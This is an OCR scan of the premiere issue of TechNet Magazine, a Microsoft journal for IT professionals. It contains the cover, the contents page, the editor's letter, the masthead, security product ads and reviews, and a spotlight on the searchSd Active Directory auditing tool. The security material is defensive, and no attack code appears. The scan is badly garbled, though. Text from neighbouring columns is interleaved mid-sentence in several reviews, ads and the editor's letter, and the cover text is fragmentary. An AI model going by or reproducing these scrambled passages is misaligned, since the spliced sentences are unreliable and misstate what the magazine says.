M A G A. 
The Microsoft Jou ‘na 


www.technetmagazine.com 


SE 


PREMIERE ISSUE 


TY 


FIGHT BACK - os 
AGAINST HACKEE 
LOCK DOWN  WMIXIT UP 
YOUR NETWC Mac, UNIX, And 
Detect And Prever Active Directory 
Session Hijacking 

_ FREE 
SECRETS _ SECURITY 
REVEALED TOOLS 
Catch Hackers Six Resources 
In The Act For IT Pros 


BOOST YOUR 
ETWORK’S IQ 
With Smart Cards 


How To Respond To 
A Network Breach 


FOCUS ON... 
03595. CANADASTSE : Office « Exchanges SQL Server 
s5.95us 37 95c44 IIS 6.0* Windows XP SP2 


| | : Microsoft TechNet 
11486'010820"' 4 ; ' 


Who’s guarding your Exchange Server? 


Fifi = a single anti-virus engine 


+ static anti-spam! 


\ 3 : ee A 


98% Bayesian spam detection, multiple virus engines, heuristic analysis & more! 


iMailEssentials @ © iMailSecurity 


GFI MailEssentials for Exchange/SMTP GFI MailSecurity for Exchange/SMTP 
Server based anti-spam, disclaimers, mail archiving & more Email anti-virus, content checking, exploit detection & anti-Trojan 


e Bayesian filtering e Multiple virus engines 
Detects spam based on statistical message analysis Higher detection rate and faster response 
e Automatic whitelist management e Email content & attachment checking 
Keep whitelists up-to-date without extra admine Quarantine dangerous attachments and content 
e User-based spam quarantine e Email exploit protection 
Sort spam to users’ ‘junk mail’ folders Protect against present and future viruses based on exploits 
e Blacklists scanning e Trojan & Executable Scanner 
Stop mail from blacklisted senders Detect malicious executables without virus updates 
e Email header analysis + keyword checking e HTML threats analysis 


Blocks spam based on message field info and keywords Disable HTML scripts 


Used by customers like NASA, US Navy, MG Rover, Prudential, First National 
Bank and Trust, Fujitsu and many others 


Used by customers like Catterpillar, IBM, Schuff International, Toyota, 
PerotSystems and many others 


GUT Matt vverdiny Cnlbpardion 


GFI MailEssentials configuration 


GFI MailSecurity configuration 


Download your evaluation version today from www.gfi.com/tn 


= lm NETWORK SECURITY 
ra CONTENT SECURITY 


MESSAGING 


tel: +1 888 243 4329 | email: sales@gfi.com | url: www.gfi.com/tn 


> 


“J 
ee 


anal. 
CL | 


Hacking: Fight Back 


Anatomy Of A Hack: How A Criminal 


Might Infiltrate Your Network 


Jesper Johansson 


From elevating privileges to running SQL injection attacks, the criminal hacker has 
quite a few tricks up his sleeve. You'd better know what they are if you're going to keep | directory functionality for mixed environments, including those with UNIX-based 
| machines? Find out what you need to achieve the single sign-on functionality 
you've been hoping for in your heterogeneous environment. 


this malevolent character out of your network. 
page 24 


Theft On The Web: 

Prevent Session 

Hijacking 

Kevin Lam, David LeBlanc, 

and Ben Smith 

There's a variety of ways that bad guys can take control 
of your network sessions, and they can do a lot of 
damage once they do take over. They can steal credit 
card information, user names, passwords, and more. 
Find out how to thwart their attempts before it’s too late. 
page 36 


Beat Hackers At Their Own 
Game WithA 
Hackerbasher Site 


Marnie Hutcheson 

Wouldn’t it be great if you could turn the tables on 
Web site hack attempts by diverting them to a dead 
end where you can log all the information the at- 


tacker left behind? Here's how you can construct your own web to snare would-be | 


attackers. 
page 44 


The Day After: 


Your First Response To A Security Breach 


Kelly J. Cooper 


They don’t call it a post mortem for nothing. After an attack, it’s best to assess the 
situation quickly, before facts slip away and the trail goes cold. Learn what makes a 


good post-hack post mortem. 
page 50 


Net 


| page 56 


Tech! \< 


the Microsofe Journal Boe IT: Biafestonale 


L ANATOMY 


a HACK 


PREMIERE ISSUE 


= WUXIT UP 
Mac, UNIX, And 
Active Directory 


roolLs 
© Six Resources 
For. IT Pros 


How To Respond To 
A Network Breach 


Exchange «SQL Server 
US 6.0* Windows XP SP2 


Microsoft TechNet 


PREMIERE ISSUE 


www.technetmagazine.com 


Cross-Platform Security 
| Mixing It Up: 
| Windows, UNIX, And Active Directory 


| Peter Larsen and Jason Zions 
Did you know that with Active Directory you can provide centralized security and 


Yes, You Can! 

Secure Your Mac OnA 
Windows Network | 
Jay Shaw 

Don’t let your lack of experience with Apple comput- 
ers paralyze your attempts to connect them to your 
Windows-based network. Using Services for Macin- 
tosh, even a novice can get Windows and Mac ma- 
chines to play together nicely. 

page 62 


Securi 
Beyond The Basics 
Get Smart! 


Boost Your Network’s |O 
With Smart Cards 


Brian Komar 


Implementing smart card security gives you a double dose of safety—logon creden- 


| tials and a piece of physical identification. Learn about the hardware, software, and 
| management policies you need for a successful smart card deployment. 


page 66 


| Security Watch: 


| Six Free Microsoft Security Resources 


| Kai Axford 


| Microsoft Baseline Security Analyzer, Port Reporter, plus information on Windows 


| XP SP2, Software Update Services, Microsoft security events, and more. 


| page 97 


<a 


© 2004 Microsoft Corporation and CMP Media LLC. All rights reserved. 


Complying with all applicable copyright laws is the responsibility of the user. Without limiting the rights under copyright, no part of TechNet Magazine may be reproduced, stored in or introduced into a retrieval system, or transmitted in any form or 
by any means (electronic, mechanical, photocopying, recording, or otherwise), or for any purpose, without the express written permission of Microsoft Corporation. 


Active Directory, ActiveX, BackOffice, BizTalk, FrontPage, Microsoft, MSDN, MSN, Outlook, PowerPoint, SharePoint, Visual Basic, Windows, Windows NT, and Windows Server are either registered trademarks or trademarks of Microsoft Corporation in the 
United States and/or other countries. Other trademarks or trade names mentioned herein are the property of their respective owners. 


TechNet Magazine is published by CMP Media LLC. CMP Media LLC is an independent company not affiliated with Microsoft Corporation. Microsoft Corporation is solely responsible for the editorial contents of TechNet Magazine. MICROSOFT 
CORPORATION MAKES NO REPRESENTATION OR WARRANTY, EXPRESS OR IMPLIED, WITH RESPECT TO ANY CODE OR OTHER INFORMATION HEREIN, AND DISCLAIMS ANY LIABILITY WHATSOEVER FOR ANY USE OF SUCH CODE OR OTHER INFORMATION. 


You know the productivity and profitability downsides 
of downtime, but the high costs and complexities of 
traditional high availability solutions have kept their 
advantages out of your reach. Not anymore. With 
Neverfail’s cluster-class high availability and disaster 
recovery solutions, you can simply and affordably 
keep your users connected to working applications. 


Neverfail is the only company to offer high availability 
solutions for the Microsoft® technology platform that 
address both reliability and resilience — without them, 
high availability can never truly be achieved. Neverfail is 
also the only company with unique solutions designed to 
keep users continuously connected to a working 
application, no matter whether the failure occurs in the 


SERTIEUED 


D. 


operating system, a hardware component, a software 
application, or somewhere within the network. If Neverfail 
finds a potential problem, in most cases, it's automatically 
fixed before it causes a failure. 


Now that you know there's a company with proven 
products that are very affordable, extremely simple to 
install and easy to maintain, can you really afford not to 
protect your company’s productivity, profitability and 
reputation? Call or email Neverfail today and let us show 
you how to eliminate downtime in no time! 


S2:327.57 72 
info@us.neverfailgroup.com 


A rfailar eWala\a: 
www.neverfailgroup.com 


Cluster-class high availability without the complexity or cost. 


Neverfail is a trademark of Neverfail Group Plc. All other trademarks, including Microsoft, Windows and Exchange, are trademarks of their respective companies. © Neverfail Group Plc, 2004. All rights reserved. No part of 
this publication may be reproduced, transmitted, transcribed, or translated into any language or computer language, in any form or by any means without prior express, written consent of Neverfail Group Plc. 


CON 


Security: Beyond The Basics 
Five Lessons From The Microsoft 
Security Center Of Excellence 
Aaron Turner 7 
Dissecting the paths leading up to Slammer, Blaster, Sasser, and } 
Code Red has allowed the Security Center of Excellence to help 
customers avoid such chaos in the future. 
page 74 


Integration 
Voice Mail In Your Inbox: Cisco Unity 

And Microsoft Exchange Make It Happen 
Jeff Centimano 

Unified messaging with Cisco Unity combines the benefits of e-mail with the convenience of phone messaging. Plus, it snaps right into Microsoft Exchange. 
page 78 


Sure your system’s secure? Our experts help 
you find your vulnerabilities, starting on page 24. 


The Front: In The Back: 


How IT Works: Domain Name Syste 
Regis Donovan 
page 83 


Case Study: A 200,000+ Desktop 
Steve Reay 


scriptors With searchSd page 88 
Serving The Web: Essential secur 
Administration For IIS 6.0 
Brett Hill 
page 91 

Round Up: 15 Tips For A Smooth 
To Exchange Server 2003 


Jenna Lyday 
page 95 


ducts For IT Professionals 


Encrypting Data, And More 


anagement In Office 2003 


Resources: IIS 6.0 Security 
Phil Sherwood 


Headers 
page 101 
TechNet Subscription Update 
g A Successful Campus page 103 


Field Notes: IT And Life Experie 
Andrew Shuman 
page 104 


Illustration by Hans Bjordahl Winter 2005 3 


“EDITOR 


It is with great pride that we present to you the inaugural issue of 
TechNet Magazine, the Microsoft journal for IT pros. Our goal is simple: we want 


to be your best source for in-depth technical information about how you can | 


best use Microsoft tools and technologies in your IT job. 


wide range of job functions, from the CIO to the network administra- 
tor to the administrative assistant responsible for resetting the laser 


line-of-business products, we will feature real-world solutions, SQL 
Server, Exchange, and other tools. Do you specialize in network 
=| infrastructure? Every issue of TechNet Magazine will discuss Win- 
dows networking and Active Directory, and will remove some of the mystery 
behind them. Perhaps you administer 5,000 desktops and need to get security 
updates out to them. Our deployment coverage is for you. 


We have unique content from Microsoft and well-known external authors. | 
Microsoft security response has had a mixed reputation in the past, but | can tell 
you that there’s no other company with as many resources dedicated to software | 
security. When | first discussed the magazine with our security response teams _ 
earlier this year, we got a flood of great info. The articles we present here, written | 


by Microsoft and external professionals, represent our commitment to security. 
Every article in TechNet Magazine will help you do your job better. The 
premiere issue, which you are now holding, focuses on security from an IT 


perspective. If you're an IT pro, you understand how important security has | 
become in your job. The best way to keep your site safe is to know the dangers 


you face, how to prevent them, and how to respond to them. Our security focus in 
this issue is split into three categories: hacking, cross-platform security, and 
beyond the basics. If you pick any article in the magazine, you'll come away with 
new tools to do your job. 


We don’t shy away from cross-platform coverage. We understand that it is the | 


rare enterprise configuration that includes a single-vendor solution in all areas. 
TechNet Magazine has been founded to assist, not evangelize. In this issue, we 
show you how to deploy Kerberos across Windows and UNIX, how to make 


Apple Macs talk to Active Directory, and how to deploy Cisco Unity with © 


Microsoft Exchange. 

We are dedicated to content. Like our sister publication, MSDN Magazine, we 
provide at least 80 pages of real content in this and future issues. It’s the only way 
we can begin to cover all the topics that can help you at work. 


The magazine is a benefit of the Microsoft TechNet program. TechNet is | 


undergoing a revitalization this year. If you're a TechNet subscriber in the United 


States, you are eligible for a free subscription to TechNet Magazine. If not, you | 
can still get all of our content online at ww.technetmagazine.com. No paid wall, just — 


great content. 
We want to hear from you. Drop us a line at tnmag@microsoft.com. Tell us what 
you want to see in future issues of TechNet Magazine, how we've helped you, and 
what you liked. You're our best partner in this venture, and we're all ears. 


Thanks to the following Microsoft technical experts for their help with this issue: Lauren | 


Antonoff, Norm Barber, Mary Browning, Charlie Chung, Steve Dodson, Ramsey Dow, Eric Fitzgerald, Ken Henderson, Joshua 


Hoffman, Kamal Janardhan, Jesper Johansson, Dan Longley, Laura Machado de Wright, Vikas Malhotra, Simon Marks, David 


Mowers, Michael Murgolo, Paul Thomsen, Angela Pan, Ben Smith, Michael Stowe, and George Swiger. 


4 TechNet Magazine 


| oc Net 


WINTER 2005 VOLUME 1 NUMBER 1 


GRANT DUERS Director 


EDITORIAL: tnmag@microsoft.com 


JOSHUA TRUPIN Executive Editor 


ETYA NOVIK Managing Editor 


We serve the technical IT professional. The term “IT pro” covers a | 


STEPHEN TOUB Technical Editor 


NANCY MICHELL Developmental Editor 


TONY ELIAS Developmental Editor 


printer down the hall. TechNet Magazine focuses on the technical 


JOAN LEVINSON Editor 


JOAN SCHNEIDER Associate Editor 


core of the IT worker. For those of you working on applications and | 


ART & PRODUCTION 


VALERIE MYERS Art and Production Director 


CARLOS BOLL Art Director 


JOHN CARICATO Web Producer 


AMY FILBIN Art and Production Associate 


ROBERT GONZALEZ Administrative Assistant 


TechNet Magazine (ISSN # 1551-2770) is published by 
CMP Media LLC. 600 Harrison St., San Francisco, CA 
94107 415-947-6000. Newsstand price is $5.95. Reg- 
istered for GST as CMP Media LLC, GST No. R13288078, 
Customer No. 2116057, Agreement No. 40011901. 
Order via the Web at http://technetmagsubs.com/ 
?k=mh. Manuscript submissions and all other corre- 
spondence should be sent to TechNet Magazine, 6" 
Floor, 1290 Avenue of the Americas, New York, NY 
10104. Copyright © 2004 Microsoft Corporation and 
CMP Media LLC. All rights reserved; reproduction in part 
or in whole without permission is prohibited. 


° 
% 
CMP 
United Business Media 


PUBLISHER:402-933-3388/kgates@cmp.com 


Kerry K. Gates 


ADVERTISING SALES: 
785-838-7573/dtimmons@cmp.com 


David Timmons Director of Sales 

Michele Hurabiell Regional Manager, West 

Ed Day Regional Manager, Central/Southeast 
Jon Hampson Regional Manager, East 

Julie Thibault Account Manager 

Michael Penne Production Manager 

Karen Jacobs Reprint Services 
800-682-4972 ext 7030 


MARKETING: 415-947-6192/ktom@cmp.com 


Karen Tom Director of Marketing 


CIRCULATION 


Kathy Henry Senior Circulation Manager 
Customer Service: lawrencecs@cmp.com 
To Place an Order: http://technetmagsubs.com/?k=mh 


CMP MEDIA LLC - MANAGEMENT 


=—=LT. | 


Gary Marshall President and CEO 

John Day Executive Vice President and CFO 

Steve Weitzner Executive Vice President and COO 
Jeff Patterson Executive Vice President, 

Corporate Sales and Marketing 

Mike Mikos Chief Information Officer 

Bill Amstutz Senior Vice President, Operations 
Leah Landro Senior Vice President, Human Resources 
Sandra Grayson Vice President and General Counsel 
Peter Westerman Vice President, Group Publisher 
Software Development Media 


Printed in the USA 


Eliminate Application-Level Vulnerabilities 


Automated Application-Level Inspection Services 


www. reasoning.com 


Security Inspection Service from Rea- | 
soning Inc.,a provider of automated soft- 
_ report of the analysis and the offending 
C++, and Java-language apps, searches for — 
security vulnerabilities that are the root 


ware inspection services that focus on C, 


cause for the majority of CERT Advisories, 
including buffer overflows, tainted data, 
race conditions, and risky operations. This 


community, or that have known signatures. 


code complete with the pre-conditions. The 
development team can then focus on fixing 


_ thevulnerability as quickly as possible. The 
_ service does not require expensive and 
| time-consuming test case creation, valida- 
includes finding defects that have not yet — 
been exploited, reported to the security 
' two weeks or less. The process allows vul- 
Static analysis can access 100 percent of the 


tion, maintenance, and processes. Reason- 
ing can normally perform this service in 


nerabilities to be removed early without ad- 


code and examine it for the structural de- ditional staff, training, or resources. 
fects that hackers are exploiting. 

Once the security inspection is complete, | Price: Based on the number of lines of code 
Reasoning provides the customer with a to beanalyzed and the depth of analysis. 


Test Your Web Apps 
wwW.ecyware.com 

GreenBlue Inspector by Ecyware is an integrated Web application analyzer. It pro- 
vides you with a compact but potent test platform for finding and documenting Web 
application vulnerabilities. The interface uses an integrated Web browser control and 
works just like a browser—a browser on steroids that lets you get under the hood and 
behind the scenes to view and modify browser requests, cookies, headers, and forms data. 
You can then analyze and document what comes back from the app and the Web server. 

[like this product and I want one of my own. Few application test efforts are equipped 
with such an easy to use, versatile test engine. And with so many tools packed into such a 
small container! 
t is} The tool collects the headers, cookies,and 
form data in a session record that you can 
modify, with data and test insertions, and 
then replay. You can analyze the Web site 
application and server responses to your 
testing using handy reports, or you can 
record your test session for deeper analysis 
coverage and documentation. 

The main workspace gives you three 
views of the page you are testing. It lets you 
see the page as it is displayed in the browser, 
you can view the HTML source, or you can 
use the forms view. Forms view gives you an editable hierarchical view of the forms on the 
application page. You can edit the source and change the values of virtually every field on a 
page. At the same time, you can follow your session steps using the event console, record 
your session, view and modify request and response headers, and cookies. You can use the 
Quick Tests page to see the effect of SQL injections, modified source code, and buffer 
overflows on the application you are testing. GreenBlue Inspector is implemented in 100 
percent .NET managed code. 


published a variety of technical papers and books on various computing topics. You can reach her at marnie@ideva.com. 


UOSBUDINH sie] 


Zz 
Ke) 
< 
a 
= 
(o) 
QO. 
¢ 
2) 
2) 
=a 
(@) 
= 
= 
70 
aa 4 
(e) 
a 
@ 
1) 
Q, 
ie) 
oS 
— 
1Ae,) 


Winter 2005 5 


Protect Data in Your 
Workstation 


www.encryptasoft.com 
The Encryption Suite by Encrypta- 


Note, EncryptaFile—that are de- 


workstation. 


using one master password. You can 


name and password straight from 


Account sits in your SysTray (next to 


soft is a collection of three encryption 
tools—EncryptAccount, Encrypta- | 


signed to protect sensitive data in your | 

EncryptAccountisa password man- | 
ager that lets you store all of your user _ 
names and passwords for easy access | 


copy and paste the appropriate user | 


EncryptAccount to the Web site login | 
page. When it’s minimized, Encrypt- 


the system clock) for quick access. 


Personal Security Tools and Gadgets 


EncryptaNote allows you to encrypt | 


_ and decrypt password-protected text 
| messages, which is especially useful in 
_ e-mails and instant messages that are 
| normally transmitted in cleartext. 
EncryptaFile allows you to encrypt 
and decrypt files anywhere on your 
_ computer (including removable media 
_ and network-connected drives). The 
' Encrypt or Decrypt options are avail- 
able in the right-click menu in the Win- 
dows’ File Explorer or via a simple to 
use interface that is similar in appear- 
_ ance to Windows Explorer. 
The Encryption Suite is built on the 
_ Microsoft’ .NET Framework. 
Price: A 30-day free trial is available for 
download. The entire suite sells for 
_ $19.95 online. 


wa 
EncryptaSo! 


Embed Hidden Messages in Media Files 


www.directlogic.com 


Secret Media, by Direct Logic Systems, allows you to embed password- 
protected hidden messages in otherwise normal audio and video media files such 
as JPG, MP3, and WMA. The hidden messages are undetectable when viewing or 


playing these files. It has an easy-to-use wiz- 
ard-style user interface thatletsyoucreateand | 
view your password-protected hidden mes- 
sages. It works with Windows 95, Windows | 
98, Windows 2000, Windows Me, and also 


Windows XP. 
Price: $19.99. 


www.syngress.com 

Security Sage’s Guide to Hardening the 
Network Infrastructure (Syngress Publish- 
ing) is billed as the first book to focus ex- 


clusively on how hackers exploit the “nuts 


and bolts” of computer networks. 
Ilike this book! It’s not only a best prac- 


tice how-to guide, it’s also a handy refer- 


ence that offers lots of examples and 


solutions on every topic it covers. In addi- | 
_ Then the authors go on to present examples 
_ of vendor products. The book does not 
_ present a comprehensive guide to products 
of any particular type, but there are candid 

discussions of specific vendor products in _ 
| most topics. Topics include features and | 
| vulnerabilities, security weaknesses to be | 
| Price: $59.95 


tion, it’s useful for both novice and seasoned 
practitioners. 

The sages (the book has multiple au- 
thors/contributors) really lay it out in 
simple and understandable terms. The early 


chapters focus on defining the network pe- 


rimeter and assessing your current secu- 
rity status. Then they discuss secure 


Secret Media 


Select a madia file you want to create into a 
Secret Media file. 


[Seiecta fie | 


network components: firewalls, routers, | 
protocols, network management, switching, | 
_ and other related topics. The later chapters 
_ focus on defense: threat detectionandhard- 
ening the design of the network and its — 
components with software, hardware, and 
| physical security procedures. 
Chapters covering specific components _ 


discuss the component in general, possible 
attacks, and how to defend against them. 


patched, and patches to be applied. 


ps 
Fal 


passwaees 
There ore 6 days remaining In the 


Stored Data 


Personal Security Database 
www. passwords-lines.com 

The Passwords-Lines database provides 
encrypted storage and easy-to-find solu- 
tions to two personal security issues. One 
is provided by Passwords, which allows 
you to save your passwords along with a 
rich set of information related to the pass- 
word (for example, what it goes to—the 
bank, my e-mail account, and so on). The 
other is provided by Lines, which allows 
you to save and retrieve data relating to 
things like college loans, credit cards, in- 
surance, investments, leases, mortgages, 
and so forth. Both Passwords and Lines in- 
teract with each other in this encrypted re- 
lational database. 

Price: A 30-day free trial is available for 
download. A license for two computers is 
available for $19.90. 


The book presents lots of examples on 
how to plan and implement security pro- 
cedures throughout the network. Real- 
world examples abound. 

Also, they discuss tools, both software 
and hardware, to help you secure, monitor, 


_ and defend your network. They typically 


start with shareware and move on to com- 
mercial products. There are lots of explana- 


_ tory diagrams, product screen shots, and 


good examples of what things are and how 
they work, what they cost, and anything else 
that is pertinent. Each chapter includes ad- 
ditional resource links, checklists, and fre- 
quently asked questions sections. All that, 
and a good read too. 


Get a FREE white 
paper, “Integrating 
Your Existing 
Microsoft® IT 
Infrastructure with 
Non-Windows 


Systems.” 


Simply go to 


www.integrateit.com 


www.vintela.com 


YOU BETTER BELIEVE IT—Integrate and Consolidate 


Some people never want to look reality in the face. 
Others gladly accept it and keep moving forward. 
Those are the kind of people who celebrate Vintela 
integration solutions that enable Unix, Linux, Mac and 
Java to work together seamlessly within your existing 
Microsoft IT infrastructure. 


Vintela is the first and only software provider that 
makes interoperability and integration of hetero- 
geneous network environments simple by extending 
your Microsoft management tools (such as SMS, 
Active Directory, Group Policy) natively to your Unix, 
Linux, Mac, and Java systems. 


So how do we do it? Through something called the 
Vintela Integration Architecture—or VIA. 


VIA is a comprehensive architectural approach that 
builds on standards to normalize your complex multi- 
platform enterprise. VIA allows you to leverage your 
existing investment in Microsoft products and 
technologies by extending them to manage non- 
Windows systems. Vintela products eliminate the need 
for duplicate tools, redundant infrastructure, and 
repetitive tasks for each platform. 


COULD IT BE? 


MICROSOFT® 
INFRASTRUCURE 
NOW UNITING UNIX, 
LINUX, MAC & JAVA 


Vintela solutions include: 


¢ Vintela Authentication Services - Integrated 
identity management and user authentication for 
Unix and Linux environments using Microsoft 
Active Directory with Kerberos and LDAP 


¢ Vintela Group Policy - Group Policy for Unix 
and Linux through Active Directory 


¢ Vintela Single Sign-on for Java - Single sign-on 
for J2EE environments from Active Directory 


¢ Vintela Management Extensions - SMS for 
Unix, Linux, and Mac 


Vintela’ 


© 2004 Vintela, Inc. All rights reserved. Vintela is a trademark of Vintela, Inc. All other brand and product names are registered trademarks or trademarks of their respective owners. 


System Access Control Utility 
www.e-motional.com 

Transparent Screen Lock PRO 3.5,a 
system access control utility from e- 
motional.com, enables IT pros to secure 
their workstations or servers with password 
protection while viewing programs that are 
running in the background. 

Transparent Screen Lock PRO 3.5 sup- 
ports optional USB proximity sensor hard- 
ware that can be used to automatically lock 
the system when the user steps away and 
reactivates it to display TSL-PRO’s pass- 
word-protected logon screen when a user 
approaches. The proximity sensor hard- 
ware option is less than two square inches 
and can be mounted on a monitor port. 

Transparent Screen Lock PRO is ideal 

for facilities that must ensure compliance 
to the 21 CFR Part 11 code of USS. federal 
regulations. It supports Windows NT, Win- 
dows 2000, Windows XP, and Windows 
Server™ 2003. 
Price: $24.95 for a single-user license of 
the base version and $49.95 for the PRO 
version. Site licenses and volume discounts 
are available. A free trial version is avail- 
able. The proximity sensor hardware op- 
tion is $129.00. 


Advanced Application 
Security Firewall 
www.rimapp.com 

RoadBLOCK (RimApp Technologies), 


based on Microsoft Internet Security and — 
_ day language. 
intelligent network security appliance | 


Acceleration (ISA) Server 2004, is an 


providing advanced applica- 
tion-layer firewall, VPN, and 
Web cache capabilities in a re) 
dedicated hardware security | Ke 


| Protect Workstations and Servers 


Proactive Defense Against Hackers and Malicious Software 


www.softsphere.com 


Anti-Cracker Shield by SoftSphere — 
Technologies protects your entire system, _ 
including software apps, network settings, | 
browsers, e-mail components, and the op- 
erating system itself. When a problem is | 
found, the program informs the user and | 


\ 8 


including DDoS and spam-machine at- | 
tacks. The server version works with sev- 
eral popular servers and allows a system © 
administrator to specify which particular | 


suggests how to fix it. Both work- 
station and server versions are 
available. 

The Anti-Cracker Shield work- 
station provides proactive protec- 
tion against attacks on the OS, 


processes need to be fully protected. 


The application explores the computer 
and its contents to identify vulnerabilities 
and potential exploits. It can identify and 
block predatory or malicious processes. It 
can also protect against new and unknown 
exploits by simply blocking any process that 
is used by hackers in order to infil- 
trate the system. Anti-Cracker 
Shield can protect Windows NT° 
services without actually switching 
them off. It does not hinder com- 
puter performance and does not 
crash the PC when an attack occurs. 


Price: $79 US Workstation and $499 US 
Server Edition. A free demo version is avail- 
able for evaluation. 


Make Your Host Anonymous | 


www. port80software.com/products 

Theless an attacker knows os 
about the target Web server, * 
the more likely he will resort 
to behaviors that make him 
an easy target for an intru- 
sion detection system (IDS) 
rule set. That is why an IDS, 


08 tex 
ntent-Length: 2868 


vides centralized Web management for each 


_ and every ISA Server 2004 firewall feature. 


RimApp’s RoadBLOCK Web-based ad- 
ministration tool makes complex firewall 
configuration tasks simple by using every- 


The RoadBLOCK Firewall includes en- 
hanced security and ease of 
management tools, powered 
by GFI, a developer of mes- 
saging, content security, and 


solution. A full range of prod- ROADBLOCK SECURITY network security software. 


ucts are available to suit both 
small to medium businesses 
and also enterprise businesses. 

ISA Server 2004, part of Windows Server 
System, is the advanced stateful inspection 
application that enables users to easily 
maximize existing IT investments by im- 
proving network security and performance. 


The RoadBLOCK’s Web interface pro- | 


FIREWALL APPLIANC 


© These include e-mail anti- 
virus and content checking, 


_ Web content checking, intrusion detection, 


anti-Trojan and anti-spam disclaimers, 
mail archiving, real-time Web monitoring, 
Web download antivirus, and security 
scanning and patch management. 


Price: Estimated SRP is $2,300. 


In the battle against hackers, 
which tank are you driving? 


like a firewall or antivirus system, should 
_ besupplemented by host anonymization— 
the hiding or obfuscating of 
vendor, version, and other 
information that malicious 
hackers use to profile the 
software running on a host 
prior to mounting an attack. 

This is where tools like 
ServerMask 2.2 from Port80 Software 
come in. By keeping a Microsoft IIS Web 
server from being “fingerprinted” by a 
hacker, ServerMask increases the efficiency 
of intrusion detection systems. 

Popular among government and finan- 
cial organizations, ServerMask 2.2 provides 
extensive masking of HTTP response data 
for IIS (hiding, altering, or randomizing the 
Server header, changing HTTP header or- 
der, masking any header, and masking ASP 
session cookies). 

ServerMask 3.0 takes this idea even fur- 
ther, allowing IIS to defeat all attempts at 
HTTP-level fingerprinting and to thwart 
stack scanners like NMAP that use subtle 
variations in different vendors’ TCP/IP 
implementations to fingerprint the operat- 
ing system itself. 


Price: $99.95 for a single server license. A 
30-day free trial is available for download. 


All prices were confirmed at press time and are subject to change. 


| Your IT department is interested in con- 
ducting security audits. The group wants 


to have statistics generated about the usage 
of access control entries (ACEs) in their do- | 
main deployment. They want to be able to - 


run a job every Sunday at 1:00 A.M. that 
will log the results to an XML file. These 


Active Directory” or for any existing ob- 
jects that have been hidden, and possible 


signs of suspicious activity that should be 


investigated further. 

As part of their audits, the IT depart- 
ment finds a security group that they are 
interested in deleting due to inactivity. 
They're convinced this group is not being 
used, but how do they know for sure? 


The searchSd command-line tool was 


written by Gokay Hurmali, a Software — 


Design Engineer in Test working in the 
Microsoft Directory and Identity Services 


group. The tool analyzes security descrip- 


ation of searchSd was motivated by the 


absence of a built-in way for Windows’ to 


| 
| 
| tors of objects in Active Directory. The cre- 
| 
| 
| 


search for authorization data within Active 
Directory. Active Directory stores security 
| descriptors as binary attributes of objects 


| and as a result does not allow for custom- | 
| main naming context. However, this can be 


| ized searching of a descriptor’s fields. 
This tool has two modes. The first mode 


www.technetmagazine.com 


logs can then be examined to check for any — 
new access rights that have been added to | 


is accessed by running searchSd with the | 
/test:searchDacl switch. This mode will - 


UTILITY 


Analyze Security Descriptors with searchSd 


SPOTLIGHT 


Figure 1 Object Ownership in the Domain 


C:\>searchSd.exe /test:dumpOwner /hostmachine:myDc /admin:Administrator /adminpwd:Iw02tS!y / 


domain:myDomain 


tool_dumpOwner: total objects checked: 11916 failure to read SD : 0 


BUILTIN\Administrators (S-1-5-32-544) 
owns 13 objects 


MYDOMAIN\ Domain Admins (S-1-5-21-306529421 -2353485120-531261498-512) 


owns 11890 objects 
NT AUTHORITY\SYSTEM (S-1-5-18) 
owns 8 objects 


MYDOMAIN\DS3X12$ (S-1-5-21-306529421-2353485120-531261498-7753) 


owns 2 objects 


unknown sid [$-1-5-21-4047798943-3841610301-3130714431-512] 


owns 1 objects 


unknown sid [S-1-5-21-306529421-2353485120-531261498-1105] 


owns 1 objects 


MYDOMAIN\ua (S-1-5-21-306529421-2353485120-531261498- 16464) 


owns 1 objects 


Time elapsed for searchSd.L0G.00003.xml: 8 Seconds. 


search the discretionary access control list 


| (DACL) of a security descriptor and will 


compile a customized report for the ACEs 
in the DACL. From this, it’s possible to con- 
struct a general overview of the authoriza- 
tion hierarchy of an Active Directory © 
environment. The tool can also dump all of 
the explicit ACEs found during the search. 

Running searchSd with the /test:dump- 
Owner switch gives you access to the sec- 
ond mode, which generates a report that 
describes the owner field of each security 
descriptor found. To see all the objects in 
the report, add the /par2:dump Objects 
switch to the command line. 

In both modes, by default the search 
scope is the entire subtree under the do- 


configured with the /objectDN, /filter, and 
/Scope switches, allowing for more control 
over the target search space. 


When the tool is run, it performs an 
LDAP search and retrieves the list of all ob- 
jects in the default or user-specified search 
scope. It then reads the binary security de- 


_ scriptor information of each object and uses 


it to compile the output report. searchSd 
can run against a domain controller or Ac- 
tive Directory Application Mode (ADAM) 
service from any machine in the network, 
and it does not need to run locally on the 
domain controller or ADAM server itself, 
though it is able to do so. 

In addition to outputting information to 
the console, the searchSd tool can generate 
an XML report file containing all of the 
requested information. 

Figure 1 shows the tool being used to 
get an overall picture of object owner- 
ship in the domain. You can download the 


_ searchSd.exe utility from the TechNet 
Magazine Web site at www.technetmagazine.com.@ 


Winter 2005 9 


If You Deal Then You 
With These: Need This: 


4 VY 


Viruses Winternals 


Worms R 
MY mg ecovery 
Critical Updates 

fae eae Manager 


Tro] ans Lately you’ve been faced with a painful choice: 
; install Windows patches without testing and 
security Patches risk damage to your systems; or test every 
Malware critical update and risk infection in the meantime. 
Winternals Recovery Manager eases the pain of 
either option. Whether your systems are damaged 
by malicious code or rendered inoperable by faulty 
patches or updates, Recovery Manager quickly and 
easily restores your machines to a working state. With 
its secure repair and diagnostic environment, you'll 
solve problems, via the network, from the convenience of 
your own desk. No system is immune to attacks. But with 
Recovery Manager, recovery can be quick and painless. 


Learn More! 
1-800-408-8415 
Www .winternals.com 


© 2004 Winternals Software LP. All rights reserved. Winternals and Winternals Rec d trademarks of Winternals Software LP. 


tion 


me) 
Lu 
wn 
1) 
® 
ve 
08 
x 
Lu 
Ye) 
© 
\) 
N 
= 
) 
> 
= 
® 
7) 
6 
ep) 


Database Sizer Tools 


Where can I find a database 
sizer tool that can be used for large SQL 
Server” databases? 


You should start with the 
Scalability and Very Large Database Re- 
source Web site at www.microsoft.com/saql/techinfo/ 
administration/2000/scalability.asp. There you'll 
find sizing tools, links to case studies, best 
practices, and more. 

The Microsoft offering, DataSizer, is in- 
cluded in the BackOffice’ Resource Kit, 
along with a few other tools, including: 

A data simulator 


Is it possible to connect to 
a SOL Server 2005 Express 
Edition instance using the SOL 
2000 Query Analyzer? If yes, how 
do | refer to the Express instance? 


The SQL Server Express blog 

(blogs.msdn.com/sqlexpress/archive/ 
2004/07/23/192044.aspx) discusses this 
and other questions related to the 
beta release of SOL Server 2005 
